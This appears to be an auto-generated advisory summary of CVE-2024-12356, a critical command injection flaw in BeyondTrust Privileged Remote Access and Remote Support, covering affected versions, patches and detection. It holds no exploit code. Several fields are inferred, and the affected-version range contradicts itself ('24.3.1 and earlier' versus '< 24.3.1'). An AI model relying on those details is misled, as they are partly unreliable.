Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a critical security flaw impacting BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, tracked as CVE-2024-12356 (CVSS score: 9.8), is a command injection flaw that
Analysis Summary
# Vulnerability: Critical Command Injection in BeyondTrust Privileged Remote Access and Remote Support
## CVE Details
- CVE ID: CVE-2024-12356
- CVSS Score: 9.8 (Critical)
- CWE: Command Injection (Inferred from description)
## Affected Systems
- Products: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)
- Versions: Versions 24.3.1 and earlier (for self-hosted/on-premises versions)
- Configurations: Self-hosted/on-premises installations are highlighted as needing updates. Cloud instances were reportedly patched by the vendor.
## Vulnerability Description
This is a critical command injection vulnerability present in BeyondTrust PRA and RS products. An unauthenticated attacker can exploit this flaw to inject arbitrary commands that will be executed with the privileges of the 'site user'.
## Exploitation
- Status: Actively exploited in the wild (Added to CISA KEV catalog)
- Complexity: Not explicitly stated, but high severity and unauthenticated nature suggest potentially *Low* complexity for initial access.
- Attack Vector: Network (Implied, as it affects remote access/support products and requires exploitation)
## Impact
- Confidentiality: High (Ability to run commands usually leads to data exfiltration)
- Integrity: High (Ability to alter system state/commands)
- Availability: High (Potential for denial of service or system compromise)
*(Note: Impact ratings are standard for remote command injection flaws of this severity.)*
## Remediation
### Patches
- **Privileged Remote Access (PRA):** Update to versions including or later than patch `BT24-10-ONPREM1` or `BT24-10-ONPREM2`. (Vulnerable versions < 24.3.1)
- **Remote Support (RS):** Update to versions including or later than patch `BT24-10-ONPREM1` or `BT24-10-ONPREM2`. (Vulnerable versions < 24.3.1)
### Workarounds
The article primarily focuses on patching. Given the critical nature and active exploitation, no safe workarounds are detailed; immediate patching is the recommended course of action for self-hosted deployments.
## Detection
- **Indicators of Compromise:** Unknown specific IOCs are listed, but logs related to command execution or unexpected outbound connections from the PRA/RS infrastructure should be investigated.
- **Detection Methods and Tools:** Monitor application logs for unexpected or encoded command strings attempting execution against the vulnerable endpoints.
## References
- [CISA Adds One Known Exploited Vulnerability to Catalog](https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog)
- [BeyondTrust Security Investigation Update](https://www.beyondtrust.com/trust-center/security-advisories/bt24-11)
- [BeyondTrust CVE-2024-12356 Advisory (General Context)](https://thehackernews.com/2024/12/beyondtrust-issues-urgent-patch-for.html)